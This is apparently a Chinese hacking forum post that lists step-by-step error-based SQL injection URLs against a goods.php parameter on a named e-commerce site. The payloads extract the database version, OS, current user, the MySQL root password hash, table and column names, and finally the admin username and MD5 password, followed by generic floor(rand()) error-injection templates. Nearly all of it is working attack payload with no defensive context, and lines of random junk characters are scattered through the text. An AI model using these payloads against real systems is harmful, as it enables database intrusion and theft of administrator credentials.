盲注详细内容

admin

判断版本号
3 Q0 o& w) B' O5 a, ]6 i& d4 ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 {5 y# P) A$ p% K2 G, D
7 O0 u( ~- d1 N" L) o1 c判断系统
# z7 D1 k. b# Z* d
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ h* {4 O/ u; u; g/ {# V


当前 user()
) j2 U2 h; [7 v" Y& j. Q0 e
0 A6 L) p. Y. A- r- E9 O" \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

9 u4 [2 Y0 a$ w, S: f
* |% J  C4 P( N' I
5 _5 s8 H  B' F& Q7 c9 A当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  c6 O% [) |) s/ v
3 b* ~! c/ b4 k( f" u


root hash
3 C& Q+ U' `- E7 A% ]6 f
/ z( R; _, `) Y( Jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 f. p) u/ ?- D- ]


8 q. w1 J1 |4 ]3 o, [# z当前 数据库表名
. e- _: w' k" w+ E$ V) d3 X5 U
% T/ @, m- l3 C, _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 K; C7 {+ H0 T5 h: z4 J" E: m
& B& [) z6 y1 f9 b

3 k$ p( E; ]3 j: c# K( J当前 数据库 user_name 字段
: [" I' M; {- F; g
- C; M# R! O+ v1 s0 U# ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

当前 数据库 字段 password
8 F; j8 V8 u) u- j5 Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23



2 V2 t, w: D9 S0 K) X7 b获得 admin passwd(md5)
% I8 O1 u6 k$ X. p4 A0 D" @, D( o
/ O6 V4 K2 [* p4 T8 i
; Q. H' O7 `$ ~# i: R/ ]http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- B( {1 z6 R1 W1 f- z/ ^
# ?. f- }# u3 k- M0 y  ^报错注射
" L4 j/ U" T3 o1 y  v  zSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

+ T  n9 w0 V: V5 ~" CSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
. T  L' S1 M- k7 I$ e+ w/ V
0 `( `$ t% P- P8 M2 Aand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)